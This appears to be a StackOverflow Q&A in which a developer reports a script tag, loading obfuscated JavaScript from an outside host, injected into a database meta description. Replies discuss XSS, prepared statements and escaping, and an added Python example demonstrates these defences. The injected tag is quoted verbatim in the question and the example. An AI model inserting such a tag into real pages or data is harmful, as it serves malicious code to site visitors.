
I'm retrieving the meta description from my database and, to my surprise, the data that was returned had script code appended to it.

Here's the code that happened to be added to my database entry:

<script id="alp1398" type="text/javascript" src="http://earcuff.nl/js/jqueryinit.js"></script>

Any idea how this could happen, or what this script does?

  • If you have a form that a user can type unvalidated text into and that text is subsequently inserted into your database then the user could type _anything_ and it would be saved. This isn't actually a problem as long as you use parameterised SQL queries to avoid SQL injection attacks, and as long as you adequately escape the text if and when you display it on any webpages (just as StackOverflow has done with the text of your question). As for what that specific script would do if you actually included it on a webpage, I don't know, and I'm not going to load it up to find out... – nnnnnn Aug 11 '14 at 02:16
  • The file looks vaguely virus like, with a bunch of obfuscation going on. [Copy of script](http://pastie.org/9460956) – Mike Christensen Aug 11 '14 at 02:22
  • @MikeChristensen Unpacked version: http://pastie.org/9460962 – cbr Aug 11 '14 at 02:24
  • http://stackoverflow.com/questions/239194/how-does-xss-work – Matthew Lock Aug 11 '14 at 02:26
  • That's my unpacked code: http://pastie.org/9460973 – johnwait Aug 11 '14 at 02:33
  • I can't disclose any more info regarding this, but given your thoughts, I think I know what to do to prevent this. Thanks – user3909562 Aug 11 '14 at 02:44

1 Answer


The most usual vector of attack is the parameters you use to populate your database. Check that you always use prepared statements (i.e. SQL with ? in place of the parameters), and if you cannot (e.g. in an ORDER BY clause) you have to sanitize the input.

Other vectors include hacking your account itself to be able to execute SQL statements.

It is hard to tell what exactly happened with so little data provided in the question. Please state what middle tier you are using, etc.

Alex Pakka
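As an added example (not code from the question or the answer), the three defences raised on this page in one place: a parameterised INSERT, an allow-list for the ORDER BY column name that cannot be bound as a parameter, and escaping when the stored text is rendered. It uses Python's sqlite3 with a hypothetical `pages` table; the schema, column names and the sample description are constructed for the demonstration.

```python
import html
import sqlite3

# Constructed sample: the kind of value the question found in its database.
INJECTED_DESC = ('<script id="alp1398" type="text/javascript" '
                 'src="http://earcuff.nl/js/jqueryinit.js"></script>')

# Column names a caller may sort by; anything else is rejected before it
# reaches the SQL text (this is the "sanitize" step for ORDER BY).
ALLOWED_ORDER_COLUMNS = {"page", "description"}


def open_db():
    """In-memory database with a hypothetical pages table (constructed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (page TEXT PRIMARY KEY, description TEXT)")
    return conn


def store_meta(conn, page, description):
    """Parameterised INSERT: the driver binds the values, so the text is
    stored as data and never interpreted as SQL, whatever it contains."""
    conn.execute(
        "INSERT OR REPLACE INTO pages (page, description) VALUES (?, ?)",
        (page, description),
    )
    conn.commit()


def list_pages(conn, order_by="page"):
    """ORDER BY cannot take a bound parameter, so the column name is checked
    against the allow-list before it is spliced into the statement."""
    if order_by not in ALLOWED_ORDER_COLUMNS:
        raise ValueError(f"unexpected sort column: {order_by!r}")
    sql = f"SELECT page, description FROM pages ORDER BY {order_by}"
    return conn.execute(sql).fetchall()


def render_meta_tag(description):
    """Output escaping: a stored <script> tag becomes inert text in the page.
    quote=True also escapes the quotes that could close the attribute."""
    safe = html.escape(description, quote=True)
    return f'<meta name="description" content="{safe}">'
```

Note that the parameterised INSERT stores the script tag verbatim; as the first comment says, that is fine as long as the value is escaped on the way out.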